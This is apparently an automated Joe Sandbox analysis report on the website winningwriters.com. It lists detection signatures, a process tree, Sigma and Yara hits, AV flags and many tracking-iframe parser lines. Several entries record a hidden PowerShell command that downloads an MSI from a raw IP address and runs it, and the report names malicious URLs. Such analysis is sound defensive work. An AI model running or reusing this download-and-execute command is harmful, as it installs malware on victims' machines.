Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://winningwriters.com

Overview

General Information

Sample URL:http://winningwriters.com
Analysis ID:1557996
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected UAC Bypass using CMSTP
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1944,i,10072944039873156587,3797958150619069762,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 7156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://winningwriters.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cmd.exe (PID: 2900 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7688 cmdline: powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1656 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\users\public\2as.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 1948 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • pyexec.exe (PID: 2092 cmdline: "C:\Users\user\AppData\Local\Initiate\pyexec.exe" MD5: B6F6C3C38568EE26F1AC70411A822405)
      • pyexec.exe (PID: 2188 cmdline: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe MD5: B6F6C3C38568EE26F1AC70411A822405)
        • cmd.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • pyexec.exe (PID: 4124 cmdline: "C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe" MD5: B6F6C3C38568EE26F1AC70411A822405)
    • cmd.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000017.00000002.2201134854.00000000035A0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000015.00000002.2069622141.00000000037B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        Process Memory Space: cmd.exe PID: 2908JoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security

          System Summary

          barindex
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7688, TargetFilename: C:\users\public\2as.msi
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;, ProcessId: 2900, ProcessName: cmd.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;, CommandLine: powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2900, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;, ProcessId: 7688, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T21:00:09.875240+010020221121Exploit Kit Activity Detected192.168.2.1649803162.159.140.229443TCP
          2024-11-18T21:00:10.054902+010020221121Exploit Kit Activity Detected192.168.2.1649806104.244.42.67443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://193.188.22.73/a.mAvira URL Cloud: Label: malware
          Source: https://bcbshieldn.com/cflaer.jsAvira URL Cloud: Label: malware

          Exploits

          barindex
          Source: Yara matchFile source: 00000017.00000002.2201134854.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2069622141.00000000037B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2908, type: MEMORYSTR
          Source: https://winningwriters.com/HTTP Parser: Total embedded image size: 26788
          Source: https://winningwriters.com/HTTP Parser: Base64 decoded: {"result_page":"search\/results"}
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-KFDBLZT
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960006858&cv=11&fst=1731960006858&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=1314571359
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960013577&cv=11&fst=1731960013577&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-KFDBLZT
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960006858&cv=11&fst=1731960006858&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=1314571359
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960013577&cv=11&fst=1731960013577&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-KFDBLZT
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960006858&cv=11&fst=1731960006858&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=1314571359
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960013577&cv=11&fst=1731960013577&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960022416&cv=11&fst=1731960022416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-KFDBLZT
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960006858&cv=11&fst=1731960006858&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=1314571359
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960013577&cv=11&fst=1731960013577&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960022416&cv=11&fst=1731960022416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960030432&cv=11&fst=1731960030432&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960038420&cv=11&fst=1731960038420&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-KFDBLZT
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960006858&cv=11&fst=1731960006858&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=1314571359
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960013577&cv=11&fst=1731960013577&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960022416&cv=11&fst=1731960022416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960030432&cv=11&fst=1731960030432&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960038420&cv=11&fst=1731960038420&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960046417&cv=11&fst=1731960046417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1072733940?random=1731960054416&cv=11&fst=1731960054416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
          Source: https://winningwriters.com/HTTP Parser: No favicon
          Source: https://winningwriters.com/HTTP Parser: No <meta name="author".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="author".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="author".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="author".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="author".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="copyright".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="copyright".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="copyright".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="copyright".. found
          Source: https://winningwriters.com/HTTP Parser: No <meta name="copyright".. found
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeFile opened: C:\Users\user\AppData\Local\Initiate\msvcr90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49795 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49828 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49840 version: TLS 1.2
